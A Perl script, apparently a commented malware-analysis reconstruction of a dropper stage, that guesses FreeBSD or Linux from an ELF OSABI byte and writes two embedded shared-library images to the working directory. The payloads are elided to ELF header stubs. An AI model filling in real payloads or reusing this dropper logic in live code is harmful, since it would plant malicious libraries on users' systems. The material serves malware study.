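#!/usr/bin/perl
# Analysis reconstruction of a Perl dropper stage. It guesses the host OS from
# one byte of an ELF header, then writes two embedded ELF images (32- and
# 64-bit) to the current working directory as cong32.so and cong64.so.
use strict;
use warnings;
use Config;    # not referenced below; kept from the original listing

# Embedded payloads. Only the ELF identification prefix is shown here: magic
# "\x7fELF" followed by the class byte (0x01 = 32-bit, 0x02 = 64-bit). The
# "\..x00" tail looks like an elision of the real bytes, so the files written
# are short stubs rather than loadable libraries.
my $SO32 = "\x7f\x45\x4c\x46\x01\..x00";
my $SO64 = "\x7f\x45\x4c\x46\x02\..x00";

# OS detection, reproduced the way the malware does it (the method is buggy
# and unreliable). "%helper" is not interpolated by Perl, so as written this
# opens a file literally named %helper -- presumably a template placeholder
# for the path of an existing ELF binary.
my $name = "%helper";
my $buf  = '';
if ( open my $in, '<', $name ) {    # three-arg open: the name is never parsed as a mode or pipe
    binmode $in;
    read $in, $buf, 8;
    close $in;
}

# Byte 7 of the ELF identification is EI_OSABI; 9 is ELFOSABI_FREEBSD. A
# missing file, a short read or any other value all fall through to "Linux".
my @b   = unpack( "C*", $buf );
my $sys = $b[7];
print "System is " . ( defined $sys && $sys == 9 ? "FreeBSD" : "Linux" ) . "\n";

# Write both images. The paths are relative, so the artifacts land in whatever
# directory the script was started from. Success is only reported when the
# open, the write and the close all succeeded.
for my $drop ( [ 'x32', './cong32.so', $SO32 ], [ 'x64', './cong64.so', $SO64 ] ) {
    my ( $arch, $path, $so ) = @$drop;

    if ( open my $out, '>', $path ) {
        binmode $out;    # payload is binary; no newline translation
        my $written = print {$out} $so;
        my $closed  = close $out;    # buffered write errors surface here
        if ( $written && $closed ) {
            print "Dropped library $arch\n";
            next;
        }
    }
    warn "Failed to write $path: $!\n";
}

# Exit status stays 0 as in the original; write failures are reported on
# STDERR only.
exit 0;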